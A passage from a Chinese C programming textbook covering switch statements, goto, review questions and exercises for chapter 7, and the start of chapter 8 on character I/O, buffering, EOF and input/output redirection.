'O': o_ct++; break; case 'u': case 'U': u_ct++; break; default:  break; }         // switch结束 }            // while循环结束 printf("number of vowels:  A  E  I  O  U\n"); 473 printf("        %4d %4d %4d %4d %4d\n", a_ct, e_ct, i_ct, o_ct, u_ct); return 0; } 假设如果ch是字母i,switch语句会定位到标签为case 'i' :的位置。由于 该标签没有关联break语句,所以程序流直接执行下一条语句,即i_ct++;。 如果 ch是字母I,程序流会直接定位到case 'I' :。本质上,两个标签都指的是 相同的语句。 严格地说,case 'U'的 break 语句并不需要。因为即使删除这条 break 语 句,程序流会接着执行switch中的下一条语句,即default : break;。所以,可 以把case 'U'的break语句去掉以缩短代码。但是从另一方面看,保留这条 break语句可以防止以后在添加新的case(例如,把y作为元音)时遗漏break 语句。 下面是该程序的运行示例: Enter some text; enter # to quit. I see under the overseer.# number of vowels:   A  E  I  O  U 0  7  1  1  1 在该例中,如果使用ctype.h系列的toupper()函数(参见表7.2)可以避免 使用多重标签,在进行测试之前就把字母转换成大写字母: while ((ch = getchar()) != '#') { 474 ch = toupper(ch); switch (ch) { case 'A': a_ct++; break; case 'E': e_ct++; break; case 'I': i_ct++; break; case 'O': o_ct++; break; case 'U': u_ct++; break; default: break; } // switch结束 } // while循环结束 或者,也可以先不转换ch,把toupper(ch)放进switch的测试条件中: switch(toupper(ch))。 小结:带多重选择的switch语句 475 关键字:switch 一般注解: 程序根据expression的值跳转至相应的case标签处。然后,执行剩下的所 有语句,除非执行到break语句进行重定向。expression和case标签都必须是 整数值(包括char类型),标签必须是常量或完全由常量组成的表达式。如 果没有case标签与expression的值匹配,控制则转至标有default的语句(如果 有的话);否则,将转至执行紧跟在switch语句后面的语句。 形式: switch ( expression ) { case label1 : statement1//使用break跳出switch case label2 : statement2 default   : statement3 } 可以有多个标签语句,default语句可选。 示例: switch (choice) { case 1 : case 2 : printf("Darn tootin'!\n"); break; 476 case 3 : printf("Quite right!\n"); case 4 : printf("Good show!\n"); break; default: printf("Have a nice day.\n"); } 如果choice的值是1或2,打印第1条消息;如果choice的值是3,打印第2 条和第3条消息(程序继续执行后续的语句,因为case 3后面没有break语 句);如果choice的值是4,则打印第3条消息;如果choice的值是其他值只 打印最后一条消息。 7.7.4 switch和if else 何时使用switch?何时使用if else?你经常会别无选择。如果是根据浮 点类型的变量或表达式来选择,就无法使用 switch。如果根据变量在某范围 内决定程序流的去向,使用 switch 就很麻烦,这种情况用if就很方便: if (integer < 1000 && integer > 2) 使用switch要涵盖以上范围,需要为每个整数(3~999)设置case标 签。但是,如果使用switch,程序通常运行快一些,生成的代码少一些。 477 7.8 goto语句 早期版本的BASIC和FORTRAN所依赖的goto语句,在C中仍然可用。但 是C和其他两种语言不同,没有goto语句C程序也能运行良好。Kernighan和 Ritchie提到goto语句“易被滥用”,并建议“谨慎使用,或者根本不用”。首 先,介绍一下如何使用goto语句;然后,讲解为什么通常不需要它。 goto语句有两部分:goto和标签名。标签的命名遵循变量命名规则,如 下所示: goto part2; 要让这条语句正常工作,函数还必须包含另一条标为part2的语句,该 语句以标签名后紧跟一个冒号开始: part2: printf("Refined analysis:\n"); 7.8.1 避免使用goto 原则上,根本不用在C程序中使用goto语句。但是,如果你曾经学过 FORTRAN或BASIC(goto对这两种语言而言都必不可少),可能还会依赖 用goto来编程。为了帮助你克服这个习惯,我们先概述一些使用goto的常见 情况,然后再介绍C的解决方案。 处理包含多条语句的if语句: if (size > 12) goto a; goto b; a: cost = cost * 1.05; flag = 2; 478 b: bill = cost * flag; 对于以前的BASIC和FORTRAN,只有直接跟在if条件后面的一条语句才 属于if,不能使用块或复合语句。我们把以上模式转换成等价的C代码,标 准C用复合语句或块来处理这种情况: if (size > 12) { cost = cost * 1.05; flag = 2; } bill = cost * flag; 二选一: if (ibex > 14) goto a; sheds = 2; goto b; a: sheds= 3; b: help = 2 * sheds; C通过if else表达二选一更清楚: if (ibex > 14) sheds = 3; 479 else sheds = 2; help = 2 * sheds; 实际上,新版的BASIC和FORTRAN已经把else纳入新的语法中。 创建不确定循环: readin: scanf("%d", &score); if (score < O) goto stage2; lots of statements goto readin; stage2: more stuff; C用while循环代替: scanf("%d", &score); while (score <= 0) { lots of statements scanf("%d", &score); } more stuff; 480 跳转至循环末尾,并开始下一轮迭代。C使用continue语句代替。 跳出循环。C使用break语句。实际上,break和continue是goto的特殊形 式。使用break和 continue 的好处是:其名称已经表明它们的用法,而且这些 语句不使用标签,所以不用担心把标签放错位置导致的危险。 胡乱跳转至程序的不同部分。简而言之,不要这样做! 但是,C程序员可以接受一种goto的用法——出现问题时从一组嵌套循 环中跳出(一条break语句只能跳出当前循环): while (funct > 0) { for (i = 1, i <= 100; i++) { for (j = 1; j <= 50; j++) { 其他语句 if (问题) goto help; 其他语句 } 其他语句 } 481 其他语句 } 其他语句 help: 语句 从其他例子中也能看出,程序中使用其他形式比使用goto的条理更清 晰。当多种情况混在一起时,这种差异更加明显。哪些goto语句可以帮助if 语句?哪些可以模仿if else?哪些控制循环?哪些是因为程序无路可走才不 得已放在那里?过度地使用 goto 语句,会让程序错综复杂。如果不熟悉goto 语句,就不要使用它。如果已经习惯使用goto语句,试着改掉这个毛病。讽 刺地是,虽然C根本不需要goto,但是它的goto比其他语言的goto好用,因为 C允许在标签中使用描述性的单词而不是数字。 小结:程序跳转 关键字:break、continue、goto 一般注解: 这3种语句都能使程序流从程序的一处跳转至另一处。 break语句: 所有的循环和switch语句都可以使用break语句。它使程序控制跳出当前 循环或switch语句的剩余部分,并继续执行跟在循环或switch后面的语句。 示例: switch (number) { case 4: printf("That's a good choice.\n"); 482 break; case 5: printf("That's a fair choice.\n"); break; default: printf("That's a poor choice.\n"); } continue语句: 所有的循环都可以使用continue语句,但是switch语句不行。continue语 句使程序控制跳出循环的剩余部分。对于while或for循环,程序执行到 continue语句后会开始进入下一轮迭代。对于do while循环,对出口条件求值 后,如有必要会进入下一轮迭代。 示例: while ((ch = getchar()) != '\n') { if (ch == ' ') continue; putchar(ch); chcount++; } 以上程序段把用户输入的字符再次显示在屏幕上,并统计非空格字符。 goto语句: 483 goto语句使程序控制跳转至相应标签语句。冒号用于分隔标签和标签语 句。标签名遵循变量命名规则。标签语句可以出现在goto的前面或后面。 形式: goto label ; label : statement 示例: top : ch = getchar(); if (ch != 'y') goto top; 484 7.9 关键概念 智能的一个方面是,根据情况做出相应的响应。所以,选择语句是开发 具有智能行为程序的基础。C语言通过if、if else和switch语句,以及条件运 算符(?:)可以实现智能选择。 if 和 if else 语句使用测试条件来判断执行哪些语句。所有非零值都被视 为 true,零被视为false。测试通常涉及关系表达式(比较两个值)、逻辑表 达式(用逻辑运算符组合或更改其他表达式)。 要记住一个通用原则,如果要测试两个条件,应该使用逻辑运算符把两 个完整的测试表达式组合起来。例如,下面这些是错误的: if (a < x < z)       // 错误,没有使用逻辑运算符 … if (ch != 'q' && != 'Q')  // 错误,缺少完整的测试表达式 … 正确的方式是用逻辑运算符连接两个关系表达式: if (a < x && x < z)       // 使用&&组合两个表达式 … if (ch != 'q' && ch != 'Q')  // 使用&&组合两个表达式 … 对比这两章和前几章的程序示例可以发现:使用第6章、第7章介绍的语 句,可以写出功能更强大、更有趣的程序。 485 7.10 本章小结 本章介绍了很多内容,我们来总结一下。if语句使用测试条件控制程序 是否执行测试条件后面的一条简单语句或复合语句。如果测试表达式的值是 非零值,则执行语句;如果测试表达式的值是零,则不执行语句。if else语 句可用于二选一的情况。如果测试条件是非零,则执行else前面的语句;如 果测试表达式的值是零,则执行else后面的语句。在else后面使用另一个if语 句形成else if,可构造多选一的结构。 测试条件通常都是关系表达式,即用一个关系运算符(如,<或==)的 表达式。使用C的逻辑运算符,可以把关系表达式组合成更复杂的测试条 件。 在多数情况下,用条件运算符(?:)写成的表达式比if else语句更简 洁。 ctype.h系列的字符函数(如,issapce()和isalpha())为创建以分类字符为 基础的测试表达式提供了便捷的工具。 switch 语句可以在一系列以整数作为标签的语句中进行选择。如果紧跟 在 switch 关键字后的测试条件的整数值与某标签匹配,程序就转至执行匹 配的标签语句,然后在遇到break之前,继续执行标签语句后面的语句。 break、continue和goto语句都是跳转语句,使程序流跳转至程序的另一 处。break语句使程序跳转至紧跟在包含break语句的循环或switch末尾的下一 条语句。continue语句使程序跳出当前循环的剩余部分,并开始下一轮迭 代。 486 7.11 复习题 复习题的参考答案在附录A中。 1.判断下列表达式是true还是false。 a 100 > 3 && 'a'>'c' b 100 > 3 || 'a'>'c' c !(100>3) 2.根据下列描述的条件,分别构造一个表达式: a umber等于或大于90,但是小于100 b h不是字符q或k c umber在1~9之间(包括1和9),但不是5 d umber不在1~9之间 3.下面的程序关系表达式过于复杂,而且还有些错误,请简化并改正。 #include <stdio.h> int main(void)                  /* 1 */ {                        /* 2 */ int weight, height; /* weight以磅为单位,height以英寸为单位 *//* 4 */ scanf("%d , weight, height);          /* 5 */ if (weight < 100 && height > 64)        /* 6 */ 487 if (height >= 72)             /* 7 */ printf("You are very tall for your weight.\n"); else if (height < 72 &&> 64)        /* 9 */ printf("You are tall for your weight.\n");/* 10 */ else if (weight > 300 && !(weight <= 300)  /* 11 */ && height < 48)            /* 12 */ if (!(height >= 48))            /* 13 */ printf(" You are quite short for your weight.\n"); else                     /* 15 */ printf("Your weight is ideal.\n");      /* 16 */ /* 17 */ return 0; } 4.下列个表达式的值是多少? a.5 > 2 b.3 + 4 > 2 && 3 < 2 c.x >= y || y > x d.d = 5 + ( 6 > 2 ) e.'X' > 'T' ? 10 : 5 488 f.x > y ? y > x : x > y 5.下面的程序将打印什么? #include <stdio.h> int main(void) { int num; for (num = 1; num <= 11; num++) { if (num % 3 == 0) putchar('$'); else putchar('*'); putchar('#'); putchar('%'); } putchar('\n'); return 0; } 6.下面的程序将打印什么? 489 #include <stdio.h> int main(void) { int i = 0; while (i < 3) { switch (i++) { case 0: printf("fat "); case 1: printf("hat "); case 2: printf("cat "); default: printf("Oh no!"); } putchar('\n'); } return 0; } 7.下面的程序有哪些错误? #include <stdio.h> int main(void) { 490 char ch; int lc = 0; /* 统计小写字母 int uc = 0; /* 统计大写字母 int oc = 0; /* 统计其他字母 while ((ch = getchar()) != '#') { if ('a' <= ch >= 'z') lc++; else if (!(ch < 'A') || !(ch > 'Z') uc++; oc++; } printf(%d lowercase, %d uppercase, %d other, lc, uc, oc); return 0; } 8.下面的程序将打印什么? /* retire.c */ #include <stdio.h> int main(void) 491 { int age = 20; while (age++ <= 65) { if ((age % 20) == 0) /* age是否能被20整除? */ printf("You are %d.Here is a raise.\n", age); if (age = 65) printf("You are %d.Here is your gold watch.\n", age); } return 0; } 9.给定下面的输入时,以下程序将打印什么? q c h b #include <stdio.h> int main(void) { 492 char ch; while ((ch = getchar()) != '#') { if (ch == '\n') continue; printf("Step 1\n"); if (ch == 'c') continue; else if (ch == 'b') break; else if (ch == 'h') goto laststep; printf("Step 2\n"); laststep: printf("Step 3\n"); } printf("Done\n"); return 0; } 10.重写复习题9,但这次不能使用continue和goto语句。 493 7.12 编程练习 1.编写一个程序读取输入,读到#字符停止,然后报告读取的空格数、 换行符数和所有其他字符的数量。 2.编写一个程序读取输入,读到#字符停止。程序要打印每个输入的字 符以及对应的ASCII码(十进制)。一行打印8个字符。建议:使用字符计数 和求模运算符(%)在每8个循环周期时打印一个换行符。 3.编写一个程序,读取整数直到用户输入 0。输入结束后,程序应报告 用户输入的偶数(不包括 0)个数、这些偶数的平均值、输入的奇数个数及 其奇数的平均值。 4.使用if else语句编写一个程序读取输入,读到#停止。用感叹号替换句 号,用两个感叹号替换原来的感叹号,最后报告进行了多少次替换。 5.使用switch重写练习4。 6.编写程序读取输入,读到#停止,报告ei出现的次数。 注意 该程序要记录前一个字符和当前字符。用“Receive your eieio award”这 样的输入来测试。 7.编写一个程序,提示用户输入一周工作的小时数,然后打印工资总 额、税金和净收入。做如下假设: a.基本工资 = 1000美元/小时 b.加班(超过40小时) = 1.5倍的时间 c.税率: 前300美元为15% 续150美元为20% 494 余下的为25% 用#define定义符号常量。不用在意是否符合当前的税法。 8.修改练习7的假设a,让程序可以给出一个供选择的工资等级菜单。使 用switch完成工资等级选择。运行程序后,显示的菜单应该类似这样: ***************************************************************** Enter the number corresponding to the desired pay rate or action: 1) $8.75/hr              2) $9.33/hr 3) $10.00/hr             4) $11.20/hr 5) quit ***************************************************************** 如果选择 1~4 其中的一个数字,程序应该询问用户工作的小时数。程 序要通过循环运行,除非用户输入 5。如果输入 1~5 以外的数字,程序应 提醒用户输入正确的选项,然后再重复显示菜单提示用户输入。使用#define 创建符号常量表示各工资等级和税率。 9.编写一个程序,只接受正整数输入,然后显示所有小于或等于该数的 素数。 10.1988年的美国联邦税收计划是近代最简单的税收方案。它分为4个类 别,每个类别有两个等级。 下面是该税收计划的摘要(美元数为应征税的收入): 495 例如,一位工资为20000美元的单身纳税人,应缴纳税费 0.15×17850+0.28×(20000−17850)美元。编写一个程序,让用户指定缴纳 税金的种类和应纳税收入,然后计算税金。程序应通过循环让用户可以多次 输入。 11.ABC 邮购杂货店出售的洋蓟售价为 2.05 美元/磅,甜菜售价为 1.15 美元/磅,胡萝卜售价为 1.09美元/磅。在添加运费之前,100美元的订单有 5%的打折优惠。少于或等于5磅的订单收取6.5美元的运费和包装费,5磅~ 20磅的订单收取14美元的运费和包装费,超过20磅的订单在14美元的基础上 每续重1磅增加0.5美元。编写一个程序,在循环中用switch语句实现用户输 入不同的字母时有不同的响应,即输入a的响应是让用户输入洋蓟的磅数,b 是甜菜的磅数,c是胡萝卜的磅数,q 是退出订购。程序要记录累计的重 量。即,如果用户输入 4 磅的甜菜,然后输入 5磅的甜菜,程序应报告9磅 的甜菜。然后,该程序要计算货物总价、折扣(如果有的话)、运费和包装 费。随后,程序应显示所有的购买信息:物品售价、订购的重量(单位: 磅)、订购的蔬菜费用、订单的总费用、折扣(如果有的话)、运费和包装 费,以及所有的费用总额。 496 第8章 字符输入/输出和输入验证 本章介绍以下内容: 更详细地介绍输入、输出以及缓冲输入和无缓冲输入的区别 如何通过键盘模拟文件结尾条件 如何使用重定向把程序和文件相连接 创建更友好的用户界面 在涉及计算机的话题时,我们经常会提到输入(input)和输出 (output)。我们谈论输入和输出设备(如键盘、U盘、扫描仪和激光打印 机),讲解如何处理输入数据和输出数据,讨论执行输入和输出任务的函 数。本章主要介绍用于输入和输出的函数(简称I/O函数)。 I/O函数(如printf()、scanf()、getchar()、putchar()等)负责把信息传送 到程序中。前几章简单介绍过这些函数,本章将详细介绍它们的基本概念。 同时,还会介绍如何设计与用户交互的界面。 最初,输入/输出函数不是C定义的一部分,C把开发这些函数的任务留 给编译器的实现者来完成。在实际应用中,UNIX 系统中的 C 实现为这些函 数提供了一个模型。ANSI C 库吸取成功的经验,把大量的UNIX I/O函数囊 括其中,包括一些我们曾经用过的。由于必须保证这些标准函数在不同的计 算机环境中能正常工作,所以它们很少使用某些特殊系统才有的特性。因 此,许多C供应商会利用硬件的特性,额外提供一些I/O函数。其他函数或函 数系列需要特殊的操作系统支持,如Winsows或Macintosh OS提供的特殊图 形界面。这些有针对性、非标准的函数让程序员能更有效地使用特定计算机 编写程序。本章只着重讲解所有系统都通用的标准 I/O 函数,用这些函数编 写的可移植程序很容易从一个系统移植到另一个系统。处理文件输入/输出 的程序也可以使用这些函数。 497 许多程序都有输入验证,即判断用户的输入是否与程序期望的输入匹 配。本章将演示一些与输入验证相关的问题和解决方案。 498 8.1 单字符I/O:getchar()和putchar() 第 7 章中提到过,getchar()和 putchar()每次只处理一个字符。你可能认 为这种方法实在太笨拙了,毕竟与我们的阅读方式相差甚远。但是,这种方 法很适合计算机。而且,这是绝大多数文本(即,普通文字)处理程序所用 的核心方法。为了帮助读者回忆这些函数的工作方式,请看程序清单8.1。 该程序获取从键盘输入的字符,并把这些字符发送到屏幕上。程序使用 while 循环,当读到#字符时停止。 程序清单8.1 echo.c程序 /* echo.c -- 重复输入 */ #include <stdio.h> int main(void) { char ch; while ((ch = getchar()) != '#') putchar(ch); return 0; } 自从ANSI C标准发布以后,C就把stdio.h头文件与使用getchar()和 putchar()相关联,这就是为什么程序中要包含这个头文件的原因(其实, getchar()和 putchar()都不是真正的函数,它们被定义为供预处理器使用的 宏,我们在第16章中再详细讨论)。运行该程序后,与用户的交互如下: Hello, there. I would[enter] 499 Hello, there. I would like a #3 bag of potatoes.[enter] like a 读者可能好奇,为何输入的字符能直接显示在屏幕上?如果用一个特殊 字符(如,#)来结束输入,就无法在文本中使用这个字符,是否有更好的 方法结束输入?要回答这些问题,首先要了解 C程序如何处理键盘输入,尤 其是缓冲和标准输入文件的概念。 500 8.2 缓冲区 如果在老式系统运行程序清单8.1,你输入文本时可能显示如下: HHeelllloo,, tthheerree..II wwoouulldd[enter] lliikkee aa # 以上行为是个例外。像这样回显用户输入的字符后立即重复打印该字符 是属于无缓冲(或直接)输入,即正在等待的程序可立即使用输入的字符。 对于该例,大部分系统在用户按下Enter键之前不会重复打印刚输入的字 符,这种输入形式属于缓冲输入。用户输入的字符被收集并储存在一个被称 为缓冲区(buffer)的临时存储区,按下Enter键后,程序才可使用用户输入 的字符。图8.1比较了这两种输入。 图8.1 缓冲输入和无缓冲输入 为什么要有缓冲区?首先,把若干字符作为一个块进行传输比逐个发送 这些字符节约时间。其次,如果用户打错字符,可以直接通过键盘修正错 501 误。当最后按下Enter键时,传输的是正确的输入。 虽然缓冲输入好处很多,但是某些交互式程序也需要无缓冲输入。例 如,在游戏中,你希望按下一个键就执行相应的指令。因此,缓冲输入和无 缓冲输入都有用武之地。 缓冲分为两类:完全缓冲I/O和行缓冲I/O。完全缓冲输入指的是当缓冲 区被填满时才刷新缓冲区(内容被发送至目的地),通常出现在文件输入 中。缓冲区的大小取决于系统,常见的大小是 512 字节和 4096字节。行缓 冲I/O指的是在出现换行符时刷新缓冲区。键盘输入通常是行缓冲输入,所 以在按下Enter键后才刷新缓冲区。 那么,使用缓冲输入还是无缓冲输入?ANSI C和后续的C标准都规定输 入是缓冲的,不过最初K&R把这个决定权交给了编译器的编写者。读者可 以运行echo.c程序观察输出的情况,了解所用的输出类型。 ANSI C决定把缓冲输入作为标准的原因是:一些计算机不允许无缓冲 输入。如果你的计算机允许无缓冲输入,那么你所用的C编译器很可能会提 供一个无缓冲输入的选项。例如,许多IBM PC兼容机的编译器都为支持无 缓冲输入提供一系列特殊的函数,其原型都在conio.h头文件中。这些函数包 括用于回显无缓冲输入的getche()函数和用于无回显无缓冲输入的getch()函数 (回显输入意味着用户输入的字符直接显示在屏幕上,无回显输入意味着击 键后对应的字符不显示)。UNIX系统使用另一种不同的方式控制缓冲。在 UNIX系统中,可以使用ioctl()函数(该函数属于UNIX库,但是不属于C标 准)指定待输入的类型,然后用getchar()执行相应的操作。在ANSI C中,用 setbuf()和setvbuf()函数(详见第13章)控制缓冲,但是受限于一些系统的内 部设置,这些函数可能不起作用。总之,ANSI没有提供调用无缓冲输入的 标准方式,这意味着是否能进行无缓冲输入取决于计算机系统。在这里要对 使用无缓冲输入的朋友说声抱歉,本书假设所有的输入都是缓冲输入。 502 8.3 结束键盘输入 在echo.c程序(程序清单8.1)中,只要输入的字符中不含#,那么程序 在读到#时才会结束。但是, #也是一个普通的字符,有时不可避免要用 到。应该用一个在文本中用不到的字符来标记输入完成,这样的字符不会无 意间出现在输入中,在你不希望结束程序的时候终止程序。C 的确提供了这 样的字符,不过在此之前,先来了解一下C处理文件的方式。 8.3.1 文件、流和键盘输入 文件(file)是存储器中储存信息的区域。通常,文件都保存在某种永 久存储器中(如,硬盘、U盘或DVD等)。毫无疑问,文件对于计算机系统 相当重要。例如,你编写的C程序就保存在文件中,用来编译C程序的程序 也保存在文件中。后者说明,某些程序需要访问指定的文件。当编译储存在 名为 echo.c 文件中的程序时,编译器打开echo.c文件并读取其中的内容。当 编译器处理完后,会关闭该文件。其他程序,例如文字处理器,不仅要打 开、读取和关闭文件,还要把数据写入文件。 C 是一门强大、灵活的语言,有许多用于打开、读取、写入和关闭文件 的库函数。从较低层面上,C可以使用主机操作系统的基本文件工具直接处 理文件,这些直接调用操作系统的函数被称为底层 I/O (low-level I/O)。 由于计算机系统各不相同,所以不可能为普通的底层I/O函数创建标准库, ANSI C也不打算这样做。然而从较高层面上,C还可以通过标准I/O包 (standard I/O package)来处理文件。这涉及创建用于处理文件的标准模型 和一套标准I/O函数。在这一层面上,具体的C实现负责处理不同系统的差 异,以便用户使用统一的界面。 上面讨论的差异指的是什么?例如,不同的系统储存文件的方式不同。 有些系统把文件的内容储存在一处,而文件相关的信息储存在另一处;有些 系统在文件中创建一份文件描述。在处理文件方面,有些系统使用单个换行 符标记行末尾,而其他系统可能使用回车符和换行符的组合来表示行末尾。 有些系统用最小字节来衡量文件的大小,有些系统则以字节块的大小来衡 503 量。 如果使用标准 I/O 包,就不用考虑这些差异。因此,可以用 if (ch == )检查换行符。即使系统实际用的是回车符和换行符的组合来标记行 末尾,I/O函数会在两种表示法之间相互转换。 从概念上看,C程序处理的是流而不是直接处理文件。流(stream)是 一个实际输入或输出映射的理想化数据流。这意味着不同属性和不同种类的 输入,由属性更统一的流来表示。于是,打开文件的过程就是把流与文件相 关联,而且读写都通过流来完成。 第13章将更详细地讨论文件。本章着重理解C把输入和输出设备视为存 储设备上的普通文件,尤其是把键盘和显示设备视为每个C程序自动打开的 文件。stdin流表示键盘输入,stdout流表示屏幕输出。getchar()、putchar()、 printf()和scanf()函数都是标准I/O包的成员,处理这两个流。 以上讨论的内容说明,可以用处理文件的方式来处理键盘输入。例如, 程序读文件时要能检测文件的末尾才知道应在何处停止。因此,C 的输入函 数内置了文件结尾检测器。既然可以把键盘输入视为文件,那么也应该能使 用文件结尾检测器结束键盘输入。下面我们从文件开始,学习如何结束文 件。 8.3.2 文件结尾 计算机操作系统要以某种方式判断文件的开始和结束。检测文件结尾的 一种方法是,在文件末尾放一个特殊的字符标记文件结尾。CP/M、IBM- DOS和MS-DOS的文本文件曾经用过这种方法。如今,这些操作系统可以使 用内嵌的Ctrl+Z字符来标记文件结尾。这曾经是操作系统使用的唯一标记, 不过现在有一些其他的选择,例如记录文件的大小。所以现代的文本文件不 一定有嵌入的Ctrl+Z,但是如果有,该操作系统会将其视为一个文件结尾标 记。图8.2演示了这种方法。 504 图8.2 带文件结尾标记的文件 操作系统使用的另一种方法是储存文件大小的信息。如果文件有3000字 节,程序在读到3000字节时便达到文件的末尾。MS-DOS 及其相关系统使用 这种方法处理二进制文件,因为用这种方法可以在文件中储存所有的字符, 包括Ctrl+Z。新版的DOS也使用这种方法处理文本文件。UNIX使用这种方法 处理所有的文件。 无论操作系统实际使用何种方法检测文件结尾,在C语言中,用 getchar()读取文件检测到文件结尾时将返回一个特殊的值,即EOF(end of file的缩写)。scanf()函数检测到文件结尾时也返回EOF。通常, EOF定义 在stdio.h文件中: #define EOF (-1) 为什么是-1?因为getchar()函数的返回值通常都介于0~127,这些值对 应标准字符集。但是,如果系统能识别扩展字符集,该函数的返回值可能在 0~255之间。无论哪种情况,-1都不对应任何字符,所以,该值可用于标记 文件结尾。 某些系统也许把EOF定义为-1以外的值,但是定义的值一定与输入字符 所产生的返回值不同。如果包含stdio.h文件,并使用EOF符号,就不必担心 EOF值不同的问题。这里关键要理解EOF是一个值,标志着检测到文件结 尾,并不是在文件中找得到的符号。 505 那么,如何在程序中使用EOF?把getchar()的返回值和EOF作比较。如 果两值不同,就说明没有到达文件结尾。也就是说,可以使用下面这样的表 达式: while ((ch = getchar()) != EOF) 如果正在读取的是键盘输入不是文件会怎样?绝大部分系统(不是全 部)都有办法通过键盘模拟文件结尾条件。了解这些以后,读者可以重写程 序清单8.1的程序,如程序清单8.2所示。 程序清单8.2 echo_eof.c程序 /* echo_eof.c -- 重复输入,直到文件结尾 */ #include <stdio.h> int main(void) { int ch; while ((ch = getchar()) != EOF) putchar(ch); return 0; } 注意下面几点。 不用定义EOF,因为stdio.h中已经定义过了。 不用担心EOF的实际值,因为EOF在stdio.h中用#define预处理指令定 义,可直接使用,不必再编写代码假定EOF为某值。 506 变量ch的类型从char变为int,因为char类型的变量只能表示0~255的无 符号整数,但是EOF的值是-1。还好,getchar()函数实际返回值的类型是 int,所以它可以读取EOF字符。如果实现使用有符号的char类型,也可以把 ch声明为char类型,但最好还是用更通用的形式。 由于getchar()函数的返回类型是int,如果把getchar()的返回值赋给char类 型的变量,一些编译器会警告可能丢失数据。 ch是整数不会影响putchar(),该函数仍然会打印等价的字符。 使用该程序进行键盘输入,要设法输入EOF字符。不能只输入字符 EOF,也不能只输入-1(输入-1会传送两个字符:一个连字符和一个数字 1)。正确的方法是,必须找出当前系统的要求。例如,在大多数UNIX和 Linux系统中,在一行开始处按下Ctrl+D会传输文件结尾信号。许多微型计算 机系统都把一行开始处的Ctrl+Z识别为文件结尾信号,一些系统把任意位置 的Ctrl+Z解释成文件结尾信号。 下面是在UNIX系统下运行echo_eof.c程序的缓冲示例: She walks in beauty, like the night She walks in beauty, like the night Of cloudless climes and starry skies... Of cloudless climes and starry skies... Lord Byron Lord Byron [Ctrl+D] 每次按下Enter键,系统便会处理缓冲区中储存的字符,并在下一行打 印该输入行的副本。这个过程一直持续到以UNIX风格模拟文件结尾(按下 507 Ctrl+D)。在PC中,要按下Ctrl+Z。 我们暂停一会。既然echo_eof.c程序能把用户输入的内容拷贝到屏幕 上,那么考虑一下该程序还可以做什么。假设以某种方式把一个文件传送给 它,然后它把文件中的内容打印在屏幕上,当到达文件结尾发现EOF信号时 停止。或者,假设以某种方式把程序的输出定向到一个文件,然后通过键盘 输入数据,用echo_eof.c 来储存在文件中输入的内容。假设同时使用这两种 方法:把输入从一个文件定向到echo_eof.c中,并把输出发送至另一个文 件,然后便可以使用echo_eof.c来拷贝文件。这个小程序有查看文件内容、 创建一个新文件、拷贝文件的潜力,没想到一个小程序竟然如此多才多艺! 关键是要控制输入流和输出流,这是我们下一个要讨论的主题。 注意 模拟EOF和图形界面 模拟EOF的概念是在使用文本界面的命令行环境中产生的。在这种环境 中,用户通过击键与程序交互,由操作系统生成EOF信号。但是在一些实际 应用中,却不能很好地转换成图形界面(如Windows和Macintosh),这些用 户界面包含更复杂的鼠标移动和按钮点击。程序要模拟EOF的行为依赖于编 译器和项目类型。例如,Ctrl+Z可以结束输入或整个程序,这取决于特定的 设置。 508 8.4 重定向和文件 输入和输出涉及函数、数据和设备。例如,考虑 echo_eof.c,该程序使 用输入函数 getchar()。输出设备(我们假设)是键盘,输入数据流由字符组 成。假设你希望输入函数和数据类型不变,仅改变程序查找数据的位置。那 么,程序如何知道去哪里查找输入? 在默认情况下,C程序使用标准I/O包查找标准输入作为输入源。这就是 前面介绍过的stdin流,它是把数据读入计算机的常用方式。它可以是一个过 时的设备,如磁带、穿孔卡或电传打印机,或者(假设)是键盘,甚至是一 些先进技术,如语音输入。然而,现代计算机非常灵活,可以让它到别处查 找输入。尤其是,可以让一个程序从文件中查找输入,而不是从键盘。 程序可以通过两种方式使用文件。第 1 种方法是,显式使用特定的函数 打开文件、关闭文件、读取文件、写入文件,诸如此类。我们在第13章中再 详细介绍这种方法。第2种方法是,设计能与键盘和屏幕互动的程序,通过 不同的渠道重定向输入至文件和从文件输出。换言之,把stdin流重新赋给文 件。继续使用getchar()函数从输入流中获取数据,但它并不关心从流的什么 位置获取数据。虽然这种重定向的方法在某些方面有些限制,但是用起来比 较简单,而且能让读者熟悉普通的文件处理技术。 重定向的一个主要问题与操作系统有关,与C无关。尽管如此,许多C 环境中(包括UNIX、Linux和Windows命令提示模式)都有重定向特性,而 且一些C实现还在某些缺乏重定向特性的系统中模拟它。在UNIX上运行苹果 OS X,可以用UNIX命令行模式启动Terminal应用程序。接下来我们介绍 UNIX、Linux和Windows的重定向。 8.4.1 UNIX、Linux和DOS重定向 UNIX(运行命令行模式时)、Linux(ditto)和Window命令行提示(模 仿旧式DOS命令行环境)都能重定向输入、输出。重定向输入让程序使用文 件而不是键盘来输入,重定向输出让程序输出至文件而不是屏幕。 509 1.重定向输入 假设已经编译了echo_eof.c 程序,并把可执行版本放入一个名为 echo_eof(或者在Windows系统中名为echo_eof.exe)的文件中。运行该程 序,输入可执行文件名: echo_eof 该程序的运行情况和前面描述的一样,获取用户从键盘输入的输入。现 在,假设你要用该程序处理名为words的文本文件。文本文件(text file)是 内含文本的文件,其中储存的数据是我们可识别的字符。文件的内容可以是 一篇散文或者C程序。内含机器语言指令的文件(如储存可执行程序的文 件)不是文本文件。由于该程序的操作对象是字符,所以要使用文本文件。 只需用下面的命令代替上面的命令即可: echo_eof < words <符号是UNIX和DOS/Windows的重定向运算符。该运算符使words文件 与stdin流相关联,把文件中的内容导入echo_eof程序。echo_eof程序本身并 不知道(或不关心)输入的内容是来自文件还是键盘,它只知道这是需要导 入的字符流,所以它读取这些内容并把字符逐个打印在屏幕上,直至读到文 件结尾。因为C把文件和I/O设备放在一个层面,所以文件就是现在的I/O设 备。试试看! 注意 重定向 对于UNIX、Linux和Windows命令提示,<两侧的空格是可选的。一些系 统,如AmigaDOS(那些喜欢怀旧的人使用的系统),支持重定向,但是在 重定向符号和文件名之间不允许有空格。 下面是一个特殊的words文件的运行示例,$是UNIX和Linux的标准提示 符。在Windows/DOS系统中见到的DOS提示可能是A>或C>。 $ echo_eof < words 510 The world is too much with us: late and soon, Getting and spending, we lay waste our powers: Little we see in Nature that is ours; We have given our hearts away, a sordid boon! $ 2.重定向输出 现在假设要用echo_eof把键盘输入的内容发送到名为mywords的文件 中。然后,输入以下命令并开始输入: echo_eof>mywords >符号是第2个重定向运算符。它创建了一个名为mywords的新文件,然 后把echo_eof的输出(即,你输入字符的副本)重定向至该文件中。重定向 把stdout从显示设备(即,显示器)赋给mywords文件。如果已经有一个名为 